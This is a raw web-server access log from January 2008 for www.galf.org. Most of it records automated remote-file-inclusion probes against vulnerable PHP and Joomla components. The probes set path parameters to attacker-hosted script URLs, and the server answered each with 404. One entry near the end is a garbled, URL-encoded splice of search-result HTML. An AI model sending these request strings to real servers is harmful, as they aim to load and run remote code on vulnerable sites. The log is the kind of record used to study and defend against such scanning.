85.214.28.224 - - [27/Jan/2008:16:38:51 -0800] "GET /logs/index.php?option=com_admin&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:39:16 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:16:40:02 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:16:40:02 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:40:43 -0800] "GET /logs/access_071217.log/main.php?x=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:40:50 -0800] "GET /logs/access_071224.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:40:50 -0800] "GET /logs/access_071224.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.144.64.50 - - [27/Jan/2008:16:41:56 -0800] "GET /logs/access_070827.log/template.php?pagina=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.144.64.50 - - [27/Jan/2008:16:41:56 -0800] "GET /template.php?pagina=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.144.64.50 - - [27/Jan/2008:16:41:56 -0800] "GET /logs/template.php?pagina=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.144.64.50 - - [27/Jan/2008:16:42:16 -0800] "GET /logs/access_071217.log/template.php?pagina=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:42:39 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:42:39 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.217.26 - - [27/Jan/2008:16:42:51 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://all.meralo.de//components/com_simpleboard/teampl3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:43:31 -0800] "GET /logs/access_071217.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:43:31 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:43:31 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:43:48 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
200.73.13.24 - - [27/Jan/2008:16:44:10 -0800] "GET /logs/access.log/default.php?arquivo=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.225.85 - - [27/Jan/2008:16:45:06 -0800] "GET /logs/access_071105.log/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.225.85 - - [27/Jan/2008:16:45:06 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.189.225.85 - - [27/Jan/2008:16:45:07 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.195.44.85 - - [27/Jan/2008:16:45:12 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.85 - - [27/Jan/2008:16:45:13 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.203.217.26 - - [27/Jan/2008:16:45:20 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://all.meralo.de//components/com_simpleboard/teampl3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:45:23 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:45:23 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:46:08 -0800] "GET /logs/access_071217.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
189.20.55.20 - - [27/Jan/2008:16:46:17 -0800] "GET /logs/access.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.20.55.20 - - [27/Jan/2008:16:46:17 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
189.20.55.20 - - [27/Jan/2008:16:46:17 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.214 - - [27/Jan/2008:16:46:34 -0800] "GET /logs/scripts.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.190.51.202 - - [27/Jan/2008:16:48:06 -0800] "GET /logs/access_071105.log/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.190.51.202 - - [27/Jan/2008:16:48:06 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.190.51.202 - - [27/Jan/2008:16:48:06 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.20.156.5 - - [27/Jan/2008:16:49:23 -0800] "GET /logs/access_071210.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://polepositionlingerie.com/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:49:36 -0800] "GET /logs/access_070827.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.234.108.168 - - [27/Jan/2008:16:49:39 -0800] "GET /logs/access_070827.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:16:51:13 -0800] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:16:51:13 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:16:51:13 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:51:30 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:16:51:30 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:16:53:47 -0800] "GET /logs/access_070826.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:54:28 -0800] "GET /logs/access_070826.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:16:54:38 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.212.146 - - [27/Jan/2008:16:54:51 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.212.146 - - [27/Jan/2008:16:54:52 -0800] "GET /cendoc.php HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:28 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:29 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:31 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:32 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:39 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:40 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:40 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:43 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:56 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:56 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:16:55:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:56:10 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:56:10 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:56:11 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
124.217.249.39 - - [27/Jan/2008:16:56:29 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hungrycat.se/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.217.249.39 - - [27/Jan/2008:16:56:30 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hungrycat.se/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.31.42.12 - - [27/Jan/2008:16:58:25 -0800] "GET /logs/access_070826.log/index.php?include=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.42.12 - - [27/Jan/2008:16:58:25 -0800] "GET /index.php?include=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.31.42.12 - - [27/Jan/2008:16:58:25 -0800] "GET /logs/index.php?include=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:58:44 -0800] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:58:44 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:16:58:45 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.31.42.12 - - [27/Jan/2008:17:00:15 -0800] "GET /logs/access_071224.log/index.php?include=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:00:58 -0800] "GET /logs/access_071210.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:17:02:41 -0800] "GET /logs/access_071105.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:17:02:42 -0800] "GET /logs/access_071105.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:17:02:52 -0800] "GET /logs/access_071105.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:17:02:59 -0800] "GET /logs/access_071105.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.194.23 - - [27/Jan/2008:17:03:03 -0800] "GET /logs/access_071105.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://200.113.182.114/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.216.14.13 - - [27/Jan/2008:17:03:46 -0800] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:17:04:16 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:17:04:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.123.128.28 - - [27/Jan/2008:17:04:33 -0800] "GET /index.php?page=&lang=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:17:07:03 -0800] "GET /logs/access_071105.log//modules/agendax/addevent.inc.php?agendax_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.94.1.95 - - [27/Jan/2008:17:07:43 -0800] "GET /logs/access_071105.log/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.94.1.95 - - [27/Jan/2008:17:07:43 -0800] "GET /modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.94.1.95 - - [27/Jan/2008:17:07:44 -0800] "GET /logs/modules/Forums/favorites.php?nuke_bb_root_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:08:19 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:08:20 -0800] "GET /logs/access_070827.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22cjaycontent%22%3A.se&u=www.galf.org/logs/access_070827.log&w=cjaycontent+.se&d=UrJ5MHDuQFPx&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=yschttl%20href=%22http:/www.alldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%22%20%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20modules/cjaycontent/admin/editor2/errors.php%201%20-%20/administrator/components%20...%20class.php=http:/www.nettogolf.se/nettogolf/filer/mic22.txt%204%20-%20/awstats/data%20...%3C/div%3E%20%3Cspan%20class=url%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.or...%3C/span%3E%20%20-%20%3Cem%3E174k%3C/em%3E%20%20-%20%3Ca%20hrphotoimpactpixels_1/us1:62.112.140.125 - - [27/Jan/2008:17:08:20 -0800] "GET /logs/access_070827.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%20-%20%3Ca%20href=%22http:/216.109.125.130/search/cache?ei=UTF-8&p=%22cjaycontent%22%3A.se&u=www.galf.org/logs/access_070827.log&w=cjaycontent+.se&d=UrJ5MHDuQFPx&icp=1&.intl=us%22%3ECached%3C/a%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=yschttl%20href=%22http:/www.alldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%22%20%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.org.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=abstr%3E...%20modules/cjaycontent/admin/editor2/errors.php%201%20-%20/administrator/components%20...%20class.php=http:/www.nettogolf.se/nettogolf/filer/mic22.txt%204%20-%20/awstats/data%20...%3C/div%3E%20%3Cspan%20class=url%3Ealldredgeacademy.org/awstats/data/awstats012008.alldredgeacademy.or...%3C/span%3E%20%20-%20%3Cem%3E174k%3C/em%3E%20%20-%20%3Ca%20hrkhlnm/us1:76.104.152.10262.112.140.125 - - [27/Jan/2008:17:08:35 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:08:35 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:08:35 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
66.212.28.43 - - [27/Jan/2008:17:09:34 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
66.212.28.43 - - [27/Jan/2008:17:09:34 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
217.198.149.20 - - [27/Jan/2008:17:10:31 -0800] "GET /include.php?phpbb_root_path=http://www.eastbayworks.org/site_graphics/upload/47-core-exp? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.162 - - [27/Jan/2008:17:10:36 -0800] "GET /labia/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:10:40 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:17:13:07 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
